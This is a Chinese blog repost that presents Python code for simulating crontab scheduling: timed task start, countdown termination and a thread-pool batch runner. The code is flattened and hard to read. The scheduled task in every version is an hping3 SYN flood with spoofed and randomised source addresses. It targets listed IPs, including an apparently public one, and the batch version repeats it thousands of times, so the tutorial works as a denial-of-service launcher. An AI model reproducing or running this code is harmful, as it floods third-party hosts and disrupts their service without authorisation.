Python模拟Linux的Crontab, 写个任务计划需求
生活随笔
收集整理的這篇文章主要介紹了
Python模拟Linux的Crontab, 写个任务计划需求
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
Python模擬Linux的Crontab, 寫個任務計劃需求
來具體點
需求:執行一個程序, 程序一直是運行狀態, 這里假設是一個函數當程序運行30s的時候, 需要終止程序, 可以用python, c, c++語言實現擴展需求:當1分鐘以后, 需要重新啟動程序
def process_2():
??? # 時間幾點執行
??? # 執行process_1
??? # 開始監聽--計時
??? # 當時間超過多少s以后, 強制結束
??????? #(注意進程里面的任務執行進程是否還存在, 舉個例子, 進程的任務是在創建一個進程, 那強制結束的是任務的進程, 而你創建的進程呢?)
??? pass
?
#!/usr/bin/env python # -*- coding=utf-8 -*-import sys, time, multiprocessing, datetime, os# -----<自定義Error>----- # class MyCustomError(Exception):def __init__(self, msg=None, retcode=4999):self.retcode = int(retcode)try:if not msg:msg = "Setting time is less than the current time Error. "except:msg = "Unknown Error!!!"Exception.__init__(self, self.retcode, msg)# -----<格式化時間變成時間戳>----- # class FormatDatetime():'''Use method:FormatDatetime.become_timestamp("2018-08-21 13:19:00")'''@staticmethoddef become_timestamp(dtdt):# 將時間類型轉換成時間戳if isinstance(dtdt, datetime.datetime):timestamp = time.mktime(dtdt.timetuple())return timestampelif isinstance(dtdt, str):if dtdt.split(" ")[1:]:a_datetime = datetime.datetime.strptime(dtdt, "%Y-%m-%d %H:%M:%S")timestamp = time.mktime(a_datetime.timetuple())else:a_datetime = datetime.datetime.strptime(dtdt, "%Y-%m-%d")timestamp = time.mktime(a_datetime.timetuple())return timestampelif isinstance(dtdt, float):return dtdt# -----<計時器>----- # def timer(arg):'''use method:timer(14):param arg: 倒計時時間:return: True'''# 倒計時時間back_time = argwhile back_time != 0:sys.stdout.write('\r') ##意思是打印在清空back_time -= 1sys.stdout.write("%s" % (int(back_time)))sys.stdout.flush()time.sleep(1)return True# -----<自定義任務函數>----- # class Tasks:@staticmethoddef start():ip1 = "42.93.48.16"ip2 = "192.168.2.141"adjure = """hping3 -c 100000 -d 120 -S -w 64 -p 57511 -a 10.10.10.10 --flood --rand-source {}""".format(ip2)os.system(adjure)@staticmethoddef stop():adjure = """netstat -anpo | grep hping3 | awk -F "[ /]+" '{print $7}' | xargs -i -t kill -9 {}"""os.system(adjure)# -----<任務函數>----- # def slow_worker():'''你的自定義任務, 需要執行的代碼:return:'''print('Starting worker')time.sleep(0.1)print('Finished worker')Tasks.start()# -----<任務計劃執行時間>----- # def crontab_time(custom_time):# custom_time = "2018-08-21 13:44:00"date_time = FormatDatetime.become_timestamp(custom_time)now_time = time.time()# 余數, 有小數remainder_data = int(date_time - now_time)if remainder_data < 0:raise MyCustomErrorelse:while remainder_data > 0:remainder_data -= 1time.sleep(1)return True# -----<執行函數>----- # def my_crontab(custom_time='', frequency=1, countdown=0):'''幾點幾分執行任務此函數屬于業務邏輯, 可以考慮再次封裝custom_time = "2018-08-21 13:19:00" 時間格式必須是這樣frequency = 1 # 頻次countdown = 0 # 倒計時多少s:return:'''if custom_time:crontab_time_status = crontab_time(custom_time)if crontab_time_status:for i in range(frequency):p = multiprocessing.Process(target=slow_worker)p.start()if countdown:status = timer(countdown)if status:p.terminate()Tasks.stop()else:for i in range(frequency):p = multiprocessing.Process(target=slow_worker)p.start()if countdown:status = timer(countdown)if status:p.terminate()Tasks.stop()if __name__ == '__main__':my_crontab(frequency=1, countdown=50) View Code?
如果是批量的呢?
?
#!/usr/bin/env python # -*- coding=utf-8 -*- import queue import threading import contextlib import sys, time, multiprocessing, datetime, os# -----<自定義Error>----- # class MyCustomError(Exception):def __init__(self, msg=None, retcode=4999):self.retcode = int(retcode)try:if not msg:msg = "Setting time is less than the current time Error. "except:msg = "Unknown Error!!!"Exception.__init__(self, self.retcode, msg)# -----<格式化時間變成時間戳>----- # class FormatDatetime():''' Use method:FormatDatetime.become_timestamp("2018-08-21 13:19:00")''' @staticmethoddef become_timestamp(dtdt):# 將時間類型轉換成時間戳if isinstance(dtdt, datetime.datetime):timestamp = time.mktime(dtdt.timetuple())return timestampelif isinstance(dtdt, str):if dtdt.split(" ")[1:]:a_datetime = datetime.datetime.strptime(dtdt, "%Y-%m-%d %H:%M:%S")timestamp = time.mktime(a_datetime.timetuple())else:a_datetime = datetime.datetime.strptime(dtdt, "%Y-%m-%d")timestamp = time.mktime(a_datetime.timetuple())return timestampelif isinstance(dtdt, float):return dtdt# -----<計時器>----- # def timer(arg):''' use method:timer(14):param arg: 倒計時時間:return: True''' # 倒計時時間back_time = argwhile back_time != 0:sys.stdout.write('\r') ##意思是打印在清空back_time -= 1sys.stdout.write("%s" % (int(back_time)))sys.stdout.flush()time.sleep(1)return True# -----<自定義任務函數>----- # class Tasks:@staticmethoddef start():ip1 = "42.93.48.16"ip2 = "192.168.2.141" # 57511ip3 = "192.168.2.147" # 8082adjure = """hping3 -c 100000 -d 120 -S -w 64 -p 57511 -a 10.10.10.10 --flood --rand-source {}""".format(ip2)os.system(adjure)@staticmethoddef stop():adjure = """netstat -anpo | grep hping3 | awk -F "[ /]+" '{print $7}' | xargs -i -t kill -9 {}"""os.system(adjure)# -----<任務函數>----- # def slow_worker():''' 你的自定義任務, 需要執行的代碼:return:''' print('Starting worker')time.sleep(0.1)print('Finished worker')Tasks.start()# -----<任務計劃執行時間>----- # def crontab_time(custom_time):# custom_time = "2018-08-21 13:44:00"date_time = FormatDatetime.become_timestamp(custom_time)now_time = time.time()# 余數, 有小數remainder_data = int(date_time - now_time)if remainder_data < 0:raise MyCustomErrorelse:while remainder_data > 0:remainder_data -= 1time.sleep(1)return True# -----<執行函數>----- # def my_crontab(custom_time='', frequency=1, countdown=20):''' 幾點幾分執行任務此函數屬于業務邏輯, 可以考慮再次封裝custom_time = "2018-08-21 13:19:00" 時間格式必須是這樣frequency = 1 # 頻次countdown = 0 # 倒計時多少s:return:''' if custom_time:crontab_time_status = crontab_time(custom_time)if crontab_time_status:for i in range(frequency):p = multiprocessing.Process(target=slow_worker)p.start()if countdown:status = timer(countdown)if status:p.terminate()Tasks.stop()else:for i in range(frequency):p = multiprocessing.Process(target=slow_worker)p.start()if countdown:status = timer(countdown)if status:p.terminate()Tasks.stop()StopEvent = object()# -----<線程池>----- # class ThreadPool(object):def __init__(self, max_num):self.q = queue.Queue()self.max_num = max_numself.terminal = Falseself.generate_list = []self.free_list = []def run(self, func, args, callback=None):""" 線程池執行一個任務:param func: 任務函數:param args: 任務函數所需參數:param callback: 任務執行失敗或成功后執行的回調函數,回調函數有兩個參數1、任務函數執行狀態;2、任務函數返回值(默認為None,即:不執行回調函數):return: 如果線程池已經終止,則返回True否則None""" if len(self.free_list) == 0 and len(self.generate_list) < self.max_num:self.generate_thread()w = (func, args, callback,)self.q.put(w)def generate_thread(self):""" 創建一個線程""" t = threading.Thread(target=self.call)t.start()@contextlib.contextmanagerdef worker_state(self, xxx, val):xxx.append(val)try:yieldfinally:xxx.remove(val)def call(self):""" 循環去獲取任務函數并執行任務函數""" current_thread = threading.currentThreadself.generate_list.append(current_thread)event = self.q.get()while event != StopEvent:func, arguments, callback = eventtry:result = func(*arguments)status = Trueexcept Exception as e:status = Falseresult = eif callback is not None:try:callback(status, result)except Exception as e:passif self.terminal: # Falseevent = StopEventelse:# self.free_list.append(current_thread)# event = self.q.get()# self.free_list.remove(current_thread)with self.worker_state(self.free_list, current_thread):event = self.q.get()else:self.generate_list.remove(current_thread)def close(self):num = len(self.generate_list)while num:self.q.put(StopEvent)num -= 1# 終止線程(清空隊列)def terminate(self):self.terminal = Truewhile self.generate_list:self.q.put(StopEvent)self.q.empty()if __name__ == '__main__':pool = ThreadPool(20)for item in range(200):pool.run(func=my_crontab, args=('', 1, 20))pool.terminate() 批量?
#!/usr/bin/env python # -*- coding=utf-8 -*- import queue import threading import contextlib import sys, time, multiprocessing, datetime, os# -----<自定義Error>----- # class MyCustomError(Exception):def __init__(self, msg=None, retcode=4999):self.retcode = int(retcode)try:if not msg:msg = "Setting time is less than the current time Error. "except:msg = "Unknown Error!!!"Exception.__init__(self, self.retcode, msg)# -----<格式化時間變成時間戳>----- # class FormatDatetime():'''Use method:FormatDatetime.become_timestamp("2018-08-21 13:19:00")'''@staticmethoddef become_timestamp(dtdt):# 將時間類型轉換成時間戳if isinstance(dtdt, datetime.datetime):timestamp = time.mktime(dtdt.timetuple())return timestampelif isinstance(dtdt, str):if dtdt.split(" ")[1:]:a_datetime = datetime.datetime.strptime(dtdt, "%Y-%m-%d %H:%M:%S")timestamp = time.mktime(a_datetime.timetuple())else:a_datetime = datetime.datetime.strptime(dtdt, "%Y-%m-%d")timestamp = time.mktime(a_datetime.timetuple())return timestampelif isinstance(dtdt, float):return dtdt# -----<計時器>----- # def timer(arg):'''use method:timer(14):param arg: 倒計時時間:return: True'''# 倒計時時間back_time = argwhile back_time != 0:sys.stdout.write('\r') ##意思是打印在清空back_time -= 1sys.stdout.write("%s" % (int(back_time)))sys.stdout.flush()time.sleep(1)return True# -----<自定義任務函數>----- # class Tasks:@staticmethoddef start():ip1 = "42.93.48.16" # 8008,8088ip2 = "192.168.2.141" # 57511ip3 = "192.168.2.147" # 8082adjure2 = """hping3 -c 500000 -d 120 -S -w 64 -p 57511 -a 10.10.10.10 --flood --rand-source {}""".format(ip2)adjure3 = """hping3 -c 500000 -d 120 -S -w 64 -p 8072 -a 10.10.10.10 --flood --rand-source {}""".format(ip3)adjure1 = """hping3 -c 500000 -d 120 -S -w 64 -p 8082 -a 10.10.10.10 --flood --rand-source {}""".format(ip1)os.system(adjure2)@staticmethoddef stop():adjure = """netstat -anpo | grep hping3 | awk -F "[ /]+" '{print $7}' | xargs -i -t kill -9 {}"""os.system(adjure)# -----<任務函數>----- # def slow_worker():'''你的自定義任務, 需要執行的代碼:return:'''print('Starting worker')time.sleep(0.1)print('Finished worker')Tasks.start()# -----<任務計劃執行時間>----- # def crontab_time(custom_time):# custom_time = "2018-08-21 13:44:00"date_time = FormatDatetime.become_timestamp(custom_time)now_time = time.time()# 余數, 有小數remainder_data = int(date_time - now_time)if remainder_data < 0:raise MyCustomErrorelse:while remainder_data > 0:remainder_data -= 1time.sleep(1)return True# -----<執行函數>----- # def my_crontab(custom_time='', frequency=1, countdown=20):'''幾點幾分執行任務此函數屬于業務邏輯, 可以考慮再次封裝custom_time = "2018-08-21 13:19:00" 時間格式必須是這樣frequency = 1 # 頻次countdown = 0 # 倒計時多少s:return:'''if custom_time:crontab_time_status = crontab_time(custom_time)if crontab_time_status:for i in range(frequency):p = multiprocessing.Process(target=slow_worker)p.start()if countdown:status = timer(countdown)if status:p.terminate()Tasks.stop()else:for i in range(frequency):p = multiprocessing.Process(target=slow_worker)p.start()if countdown:status = timer(countdown)if status:p.terminate()Tasks.stop()StopEvent = object()# -----<線程池>----- # class ThreadPool(object):def __init__(self, max_num):self.q = queue.Queue()self.max_num = max_numself.terminal = Falseself.generate_list = []self.free_list = []def run(self, func, args, callback=None):"""線程池執行一個任務:param func: 任務函數:param args: 任務函數所需參數:param callback: 任務執行失敗或成功后執行的回調函數,回調函數有兩個參數1、任務函數執行狀態;2、任務函數返回值(默認為None,即:不執行回調函數):return: 如果線程池已經終止,則返回True否則None"""if len(self.free_list) == 0 and len(self.generate_list) < self.max_num:self.generate_thread()w = (func, args, callback,)self.q.put(w)def generate_thread(self):"""創建一個線程"""t = threading.Thread(target=self.call)t.start()@contextlib.contextmanagerdef worker_state(self, xxx, val):xxx.append(val)try:yieldfinally:xxx.remove(val)def call(self):"""循環去獲取任務函數并執行任務函數"""current_thread = threading.currentThreadself.generate_list.append(current_thread)event = self.q.get()while event != StopEvent:func, arguments, callback = eventtry:result = func(*arguments)status = Trueexcept Exception as e:status = Falseresult = eif callback is not None:try:callback(status, result)except Exception as e:passif self.terminal: # Falseevent = StopEventelse:# self.free_list.append(current_thread)# event = self.q.get()# self.free_list.remove(current_thread) with self.worker_state(self.free_list, current_thread):event = self.q.get()else:self.generate_list.remove(current_thread)def close(self):num = len(self.generate_list)while num:self.q.put(StopEvent)num -= 1# 終止線程(清空隊列)def terminate(self):self.terminal = Truewhile self.generate_list:self.q.put(StopEvent)self.q.empty()if __name__ == '__main__':pool = ThreadPool(10)for i in range(1, 100):for item in range(3000):pool.run(func=my_crontab, args=('', 1, 60))time.sleep(5 * 0.5)pool.terminate()os.system("ps -aux | grep aa.py |grep -v grep | awk '{print $2}' | xargs -i -t kill -9 {}") 再次改進后?
轉載于:https://www.cnblogs.com/renfanzi/p/9511705.html
總結
以上是生活随笔為你收集整理的Python模拟Linux的Crontab, 写个任务计划需求的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 如何在苹果官网下载旧版本的Xcode
- 下一篇: python笔记-python编程优化: